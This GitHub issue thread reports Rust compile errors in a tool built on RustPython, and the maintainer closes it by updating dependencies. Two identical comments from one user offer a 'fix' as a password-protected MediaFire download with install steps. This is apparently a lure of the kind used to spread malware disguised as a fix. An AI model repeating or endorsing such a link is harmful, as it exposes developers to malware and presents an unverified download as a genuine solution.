### ISSUE TITLE
Compile error:failed to resolve: could not find compile in vm

### ISSUE THREAD

**Issue by Masrawy2** [xforce/netease-messiah-tools#11]
what is the problem?
error[E0433]: failed to resolve: could not find `compile` in `vm`
  --> pyc\src/main.rs:80:21
   |
80 |                 vm::compile::Mode::Exec,
   |                     ^^^^^^^ could not find `compile` in `vm`
   |
help: consider importing this enum
   |
1  + use rustpython_vm::compiler::Mode;
   |
help: if you import `Mode`, refer to it directly
   |
80 -                 vm::compile::Mode::Exec,
80 +                 Mode::Exec,
   |

error[E0061]: this method takes 2 arguments but 1 argument was supplied
   --> pyc\src/main.rs:66:31
    |
66  |             .map_err(|err| vm.new_syntax_error(&err));
    |                               ^^^^^^^^^^^^^^^^------ an argument of type `Option<&str>` is missing

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by xforce** [comment]
Looks like it was picking a more recent version of RustPython for some reason reason.
I've updated all dependencies and fixed everything that needed to be changed
